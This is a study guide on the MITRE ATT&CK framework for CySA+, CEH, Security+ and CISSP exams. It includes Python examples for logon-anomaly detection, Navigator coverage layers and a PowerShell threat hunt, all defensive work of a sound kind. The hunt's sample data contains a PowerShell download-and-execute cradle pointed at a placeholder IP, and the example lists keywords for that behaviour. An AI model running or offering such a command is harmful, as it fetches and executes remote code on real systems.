Understanding MITRE ATT&CK Framework for Certification Exams
A comprehensive guide to the MITRE ATT&CK framework, covering its structure, how to use it, and how it appears on CEH, CySA+, Security+, and CISSP certification exams.
What Is MITRE ATT&CK?
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Developed and maintained by the MITRE Corporation, the framework organizes how attackers actually behave before, during, and after gaining access to a target environment: not theoretical attack models, but behavior documented in real intrusions.
ATT&CK is not a framework for selecting or building security controls (that is the job of NIST CSF and similar control frameworks). It is a framework for understanding and categorizing attacker behavior so that defenders can detect, analyze, and respond to it more effectively. This makes it invaluable for threat intelligence, detection engineering, threat hunting, red team planning, and incident response.
For certification candidates, MITRE ATT&CK is tested heavily on CySA+ (CS0-003), appears in CEH v13's threat analysis modules, and is referenced in CISSP's security operations and assessment domains. If you are preparing for any defensive security certification, fluency in ATT&CK is essential.
Framework Structure
ATT&CK is organized into three primary matrices:
Enterprise ATT&CK: Covers adversary behavior against enterprise IT environments: Windows, macOS, Linux, cloud (IaaS such as AWS, Azure, and GCP, plus SaaS, Office 365, and identity providers), containers, and network devices. This is the matrix most commonly referenced for certification purposes.
Mobile ATT&CK: Covers adversary behavior targeting iOS and Android mobile devices.
ICS ATT&CK: Covers adversary behavior targeting Industrial Control Systems and operational technology (OT) environments.
Within each matrix, behavior is organized into Tactics, Techniques, and Sub-techniques.
Tactics
Tactics represent the adversary's tactical goal — the reason they are performing an action. ATT&CK for Enterprise defines 14 tactics:
Reconnaissance: Gathering information before attacking the target. Includes active scanning, phishing for information, and searching open technical databases.
Resource Development: Establishing infrastructure for the attack. Acquiring accounts, building malware, setting up staging servers.
Initial Access: Gaining a first foothold in the target environment. Phishing, exploiting public-facing applications, supply chain compromise.
Execution: Running malicious code. Command and scripting interpreters, user-triggered execution, scheduled tasks.
Persistence: Maintaining access across system restarts, credential changes, and other interruptions. Registry modifications, scheduled tasks, boot process manipulation.
Privilege Escalation: Gaining higher-level permissions. Exploiting vulnerabilities, abusing sudo configurations, access token manipulation.
Defense Evasion: Avoiding detection. Obfuscation, disabling security tools, masquerading, living off the land techniques.
Credential Access: Stealing usernames and passwords. Keylogging, credential dumping (LSASS), Kerberoasting, brute force.
Discovery: Learning about the internal environment after initial access. Network scanning, account enumeration, process discovery.
Lateral Movement: Moving through the environment to reach target systems. Pass-the-hash, remote services, internal spearphishing.
Collection: Gathering data of interest to the attacker's objective. Screen capture, keylogging, data from network shares.
Command and Control: Communicating with compromised systems. Application layer protocols, encrypted channels, domain generation algorithms.
Exfiltration: Stealing data. Over command and control channels, via alternative protocols, physically.
Impact: Disrupting availability or integrity. Ransomware (data encrypted for impact), disk wipe, defacement.
Techniques and Sub-techniques
Under each tactic are specific techniques, the concrete methods used to achieve the tactic's goal. For example, under the Credential Access tactic, technique T1003 covers OS Credential Dumping, with sub-techniques for LSASS Memory (T1003.001), Security Account Manager (T1003.002), and NTDS (T1003.003). A technique can appear under more than one tactic when it serves more than one goal; Scheduled Task/Job (T1053) is listed under Execution, Persistence, and Privilege Escalation.
ATT&CK for Enterprise currently documents roughly 200 techniques and more than 400 sub-techniques, over 600 in total. You do not need to memorize all of them for certification exams, but you need to understand the structure and be able to apply it to scenario questions.
Practical Application: Detection Use Cases
ATT&CK's practical value comes from mapping detections to specific techniques. For each technique, ATT&CK provides a description, procedure examples (which groups and software have been observed using it), mitigations, and detection guidance tied to named data sources and data components such as Logon Session Creation or Process Creation.
For example, for T1078 (Valid Accounts, the use of legitimate but stolen or abused credentials), the detection guidance centers on logon session and user account data: correlate authentications across systems, look for logons at unusual times or from unusual locations, and flag an account that is active on several systems at once. In a SIEM this becomes rules for geographic and time-of-day anomalies and for impossible travel between consecutive logons. Listed mitigations include multi-factor authentication, privileged account management, password and account use policies, and user account management.
This is exactly the kind of scenario-based reasoning that CySA+ exams test. Given an observed behavior, identify the ATT&CK technique, and select the appropriate detection or mitigation response.
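The T1078 detection logic described above, written out as an added example in Python (this is not code from the page, from MITRE, or from any vendor). It runs three analytics over a handful of constructed successful-logon events: a logon from a country outside the account's baseline, a logon outside business hours, and impossible travel between two consecutive logons of the same account. The events, the baseline, the business-hours window, and the 900 km/h plausibility threshold are all assumptions made for the example; a real deployment would read logon sessions from the SIEM and derive the baseline from history.

```python
"""Added example (not from the page): a small T1078 (Valid Accounts) detector run over
constructed logon events. Three analytics: logon from a country outside the account's
baseline, logon outside business hours, and impossible travel between two logons."""
from collections import defaultdict
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

# Constructed successful-logon events (ATT&CK data component: Logon Session Creation).
# Geolocation is assumed to have been added by the SIEM from the source IP.
EVENTS = [
    {"ts": "2024-03-04T02:15:00Z", "user": "svc_backup", "src_ip": "198.51.100.7",
     "country": "US", "lat": 41.88, "lon": -87.63},
    {"ts": "2024-03-04T08:02:00Z", "user": "jdoe", "src_ip": "203.0.113.10",
     "country": "US", "lat": 40.71, "lon": -74.01},
    {"ts": "2024-03-04T08:40:00Z", "user": "jdoe", "src_ip": "192.0.2.44",
     "country": "RO", "lat": 44.43, "lon": 26.10},
    {"ts": "2024-03-05T09:15:00Z", "user": "jdoe", "src_ip": "203.0.113.10",
     "country": "US", "lat": 40.71, "lon": -74.01},
]

# Constructed 30-day baseline of the countries each account normally logs on from.
BASELINE = {"jdoe": {"US"}, "svc_backup": {"US"}}

BUSINESS_HOURS_UTC = range(7, 20)  # assumption: 07:00-19:59 UTC is normal for this org
MAX_PLAUSIBLE_KMH = 900.0          # roughly airliner speed; faster implies shared credentials


def parse_ts(ts):
    """Parse the Z-suffixed ISO 8601 timestamps used in the sample events."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dlat, dlon = p2 - p1, radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(p1) * cos(p2) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def _finding(user, event, rule, detail):
    return {"technique": "T1078", "rule": rule, "user": user, "ts": event["ts"], "detail": detail}


def analyze(events, baseline):
    """Run the three analytics per account over the events, in time order."""
    findings = []
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        by_user[e["user"]].append(e)
    for user, logons in by_user.items():
        known = baseline.get(user, set())  # unknown account: every country is new
        for i, e in enumerate(logons):
            ts = parse_ts(e["ts"])
            if e["country"] not in known:
                findings.append(_finding(user, e, "new-country",
                                         f"{e['country']} not in baseline {sorted(known)}"))
            if ts.hour not in BUSINESS_HOURS_UTC:
                findings.append(_finding(user, e, "off-hours-logon", f"logon at {ts:%H:%M} UTC"))
            if i > 0:
                prev = logons[i - 1]
                km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
                hours = (ts - parse_ts(prev["ts"])).total_seconds() / 3600
                # hours == 0 would divide by zero; two logons in the same second from
                # different places are worth a separate rule, not handled here
                if hours > 0 and km / hours > MAX_PLAUSIBLE_KMH:
                    findings.append(_finding(user, e, "impossible-travel",
                                             f"{km:.0f} km in {hours:.2f} h from {prev['src_ip']}"))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS, BASELINE):
        print(f"{f['technique']} {f['rule']:18} {f['user']:11} {f['ts']}  {f['detail']}")
```

With the sample data, the service account is flagged for an off-hours logon, and jdoe's second logon triggers both the new-country rule and impossible travel (New York to Bucharest in 38 minutes); the next-day logon back in New York is slow enough to pass. Each finding carries the technique ID so it can be counted toward coverage later.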
ATT&CK and the Cyber Kill Chain
ATT&CK and the Lockheed Martin Cyber Kill Chain are related but distinct frameworks. The Kill Chain describes the high-level phases of an attack from the attacker's perspective (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives). ATT&CK provides granular technique-level detail within and across those phases.
On certification exams, questions sometimes test your ability to map between these frameworks. Know that ATT&CK is more granular and operationally useful for detection, while the Kill Chain is better for understanding the overall attack lifecycle.
ATT&CK and the Diamond Model
The Diamond Model of Intrusion Analysis is a third complementary framework that structures incident analysis around four features: Adversary, Infrastructure, Capability, and Victim. ATT&CK techniques describe the Capability dimension. The Diamond Model helps analysts relate different observations of an incident to each other and to the threat actor.
CySA+ tests all three frameworks and expects you to understand how they complement each other in a comprehensive threat analysis program.
Threat Intelligence Applications
ATT&CK is the standard vocabulary for threat intelligence sharing. When a threat intelligence report describes a threat actor, it typically maps the actor's techniques to ATT&CK IDs. This allows security teams to compare an actor's known techniques against their own detection coverage, prioritize closing the gaps that matter for the actors targeting their sector, and build adversary emulation plans for purple team exercises.
ATT&CK Navigator is a free web tool for annotating the matrix. You load "layers" that score and color techniques, so you can visualize which techniques your detection rules cover, overlay a threat actor's techniques, and see the gaps to prioritize. It is an essential tool for security operations teams and is referenced in CySA+ study materials.
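The coverage comparison from the two paragraphs above, as an added example in Python (not code from the page or from the ATT&CK Navigator project). It takes a constructed inventory of detection rules tagged with technique IDs and a constructed technique list of the kind extracted from a CTI report, computes which of the actor's techniques have no rule, and writes the result as a Navigator layer so it can be loaded and colored in the tool. The rule names, the actor's technique list, and the version numbers in the `versions` block are assumptions for the example; set the versions to match the Navigator and ATT&CK release you actually use.

```python
"""Added example (not from the page): build an ATT&CK Navigator layer from a detection
inventory and a CTI technique list, and list the uncovered techniques."""
import json

# Constructed detection inventory: each rule is tagged with the technique(s) it detects.
RULES = [
    {"name": "Logon from country outside account baseline", "techniques": ["T1078"]},
    {"name": "Impossible travel between logons", "techniques": ["T1078"]},
    {"name": "LSASS handle opened by non-system process", "techniques": ["T1003.001"]},
    {"name": "Encoded PowerShell command line", "techniques": ["T1059.001"]},
    {"name": "schtasks.exe creating a task", "techniques": ["T1053.005"]},
    {"name": "Kerberos TGS request with RC4 for a user SPN", "techniques": ["T1558.003"]},
]

# Constructed technique list as it might be extracted from a CTI report on one actor.
ACTOR_TECHNIQUES = ["T1566.001", "T1059.001", "T1003.001", "T1021.001", "T1078", "T1486"]


def coverage_by_technique(rules):
    """Map technique ID -> list of rule names that claim to detect it."""
    cov = {}
    for rule in rules:
        for tid in rule["techniques"]:
            cov.setdefault(tid, []).append(rule["name"])
    return cov


def actor_gaps(actor_techniques, coverage):
    """Techniques the actor uses that no rule covers, sorted for stable output."""
    return sorted(t for t in set(actor_techniques) if t not in coverage)


def build_layer(name, coverage, actor_techniques):
    """Navigator layer: covered techniques scored by rule count, gaps scored 0."""
    techniques = []
    for tid, rule_names in sorted(coverage.items()):
        techniques.append({"techniqueID": tid, "score": len(rule_names),
                           "comment": "; ".join(rule_names),
                           "enabled": True, "showSubtechniques": False})
    for tid in actor_gaps(actor_techniques, coverage):
        techniques.append({"techniqueID": tid, "score": 0,
                           "comment": "actor technique with no detection rule",
                           "enabled": True, "showSubtechniques": False})
    max_score = max((t["score"] for t in techniques), default=1) or 1
    return {
        "name": name,
        # assumption: adjust to the ATT&CK and Navigator releases you run
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection coverage (score = number of rules) vs. actor techniques (score 0 = gap)",
        "techniques": techniques,
        # red for 0 through green for the best-covered technique
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": max_score},
        "legendItems": [{"label": "no detection rule", "color": "#ff6666"},
                        {"label": f"{max_score} rule(s)", "color": "#8ec843"}],
    }


def layer_json(layer):
    """Serialize for saving as a .json file and opening in Navigator."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    cov = coverage_by_technique(RULES)
    print("gaps:", actor_gaps(ACTOR_TECHNIQUES, cov))
    print(layer_json(build_layer("actor coverage check", cov, ACTOR_TECHNIQUES)))
```

With the constructed inputs the gaps are T1021.001 (Remote Desktop Protocol), T1486 (Data Encrypted for Impact) and T1566.001 (Spearphishing Attachment): the actor's entry vector, its lateral movement and its impact stage are all invisible while credential and execution behavior are covered. That ordering of priorities is the output a threat intelligence program hands to detection engineering.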
Threat Hunting With ATT&CK
Threat hunting involves proactively searching for adversary activity that has not yet triggered automated alerts. ATT&CK provides the hypothesis framework for threat hunts:
1. Select a technique or set of techniques relevant to your threat model
2. Identify the data sources needed to detect that technique (process logs, network flows, endpoint telemetry)
3. Define the expected attacker behavior pattern
4. Search your environment for evidence of that pattern
5. Document findings and either escalate as an incident or tune detection rules
This structured hypothesis-driven approach, grounded in ATT&CK, is what CySA+ exam questions about threat hunting are testing.
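The five steps above carried through for one technique, as an added example in Python (not code from the page): a hunt for T1059.001 (PowerShell) run with `-EncodedCommand`, which hides the real command from anyone skimming process logs. Steps 1 to 3 are written down as the hypothesis; step 4 searches constructed process-creation events, decodes each encoded payload (base64 of UTF-16LE text, which is what PowerShell expects) and checks it for download-and-execute indicators; step 5 decides whether to escalate or to review and tune. The events, hosts, parent processes and indicator list are assumptions for the example; the only facts taken from PowerShell itself are the encoding and the accepted short forms of the flag.

```python
"""Added example (not from the page): a hypothesis-driven hunt for T1059.001 (PowerShell)
following the five steps above, run over constructed process-creation events."""
import base64
import binascii
import re

# Steps 1-3: the hunt hypothesis, written down before touching any data.
HYPOTHESIS = {
    "technique": "T1059.001",
    "hypothesis": "An attacker runs PowerShell with -EncodedCommand to hide the payload from log review.",
    "data_sources": ["Process: Process Creation", "Command: Command Execution"],  # ATT&CK data components
    "pattern": "powershell.exe launched with an -EncodedCommand argument (or an accepted short form), "
               "worse if the decoded text downloads or evaluates code or the parent is an Office app",
}


def encode_ps(command):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (Sysmon Event ID 1 style fields, values invented).
EVENTS = [
    {"host": "WS01", "parent": "OUTLOOK.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.15/a.ps1')")},
    {"host": "SRV02", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "WS07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ec " + encode_ps("Get-Service -Name Spooler | Restart-Service")},
    {"host": "WS03", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -e notbase64!!"},
]

# PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand; match all of them,
# longest first. -ExecutionPolicy does not match because "ex" is not one of these prefixes.
_PREFIXES = sorted({"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)}, key=len, reverse=True)
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)

# Assumed indicators of download-and-execute behaviour in the decoded text.
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
              "FromBase64String", "Start-BitsTransfer")


def decode_encoded_command(blob):
    """Return the decoded command text, or None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Step 4: search the data for the pattern and return one finding per hit."""
    findings = []
    for e in events:
        if "powershell" not in e["image"].lower():
            continue
        m = _ENC_RE.search(e["cmdline"])
        if not m:
            continue
        decoded = decode_encoded_command(m.group(1))
        hits = [i for i in INDICATORS if decoded and i.lower() in decoded.lower()]
        findings.append({
            "technique": HYPOTHESIS["technique"], "host": e["host"], "parent": e["parent"],
            "decoded": decoded, "indicators": hits,
            # an encoded command that will not decode still deserves a look
            "severity": "high" if hits else "medium",
        })
    return findings


def next_action(finding):
    """Step 5: escalate confirmed malicious activity, otherwise review and tune the rule."""
    return "escalate" if finding["severity"] == "high" else "review-and-tune"


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["parent"], f["severity"], next_action(f), f["indicators"], f["decoded"])
```

The Outlook-spawned download cradle comes out as high severity and is escalated; the administrator's encoded service restart and the undecodable blob come back as medium for review, which is where you learn whether to add an exclusion for the admin tooling or to turn the hunt into a permanent rule. The `-ExecutionPolicy Bypass -File` event is a deliberate negative case: it is PowerShell, but it is not the hypothesis.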
Exam Relevance by Certification
CySA+ (CS0-003): ATT&CK is one of the most heavily tested topics. Expect questions requiring you to identify the tactic or technique for a described behavior, select detection approaches for a given technique, and explain how ATT&CK integrates with threat intelligence programs.
CEH v13: ATT&CK appears in the threat intelligence and attack methodology modules. Know the major tactics and how they relate to the ethical hacker methodology phases.
CISSP (Domain 6 and 7): ATT&CK is referenced in security assessment and testing (Domain 6) and security operations (Domain 7). Understand it as a framework for threat modeling, red team planning, and detection program design.
Security+ SY0-701: ATT&CK appears in the threats and vulnerabilities domain. Know the framework at a high level — tactics, the distinction from the Kill Chain, and how it is used for threat intelligence.
Study Tips for ATT&CK Questions
Visit attack.mitre.org and spend time navigating the Enterprise matrix. Read the descriptions for at least 20-30 high-priority techniques. Understanding the actual content of the framework is more valuable than memorizing IDs.
Practice mapping scenarios to tactics first, then techniques. If a question describes an attacker using stolen credentials to log into a remote workstation, the tactic is Lateral Movement and the technique is Remote Services (T1021), most likely its Remote Desktop Protocol sub-technique, with Valid Accounts (T1078) as the enabling technique.
Know the data sources behind common detections. ATT&CK names data sources such as Process, Command, Logon Session, Network Traffic, and File; in practice these come from EDR and Sysmon telemetry, Windows Event Logs, network flow records, and the SIEM that correlates them. Both ATT&CK detection guidance and exam questions refer to these by name.
Understand that ATT&CK is descriptive, not prescriptive. It documents what attackers do, not what defenders must do. This framing matters for management-level exam questions.
CyberCertPrep includes MITRE ATT&CK scenario questions in our CySA+, CEH, and Security+ practice question banks. Work through these to develop the pattern recognition needed for exam success.
Michael Torres
CISA, CRISC, ISO 27001 Lead Auditor
Michael is a GRC consultant specializing in compliance frameworks and risk management. He has conducted 50+ ISO 27001 audits and writes about governance, risk, and certification preparation.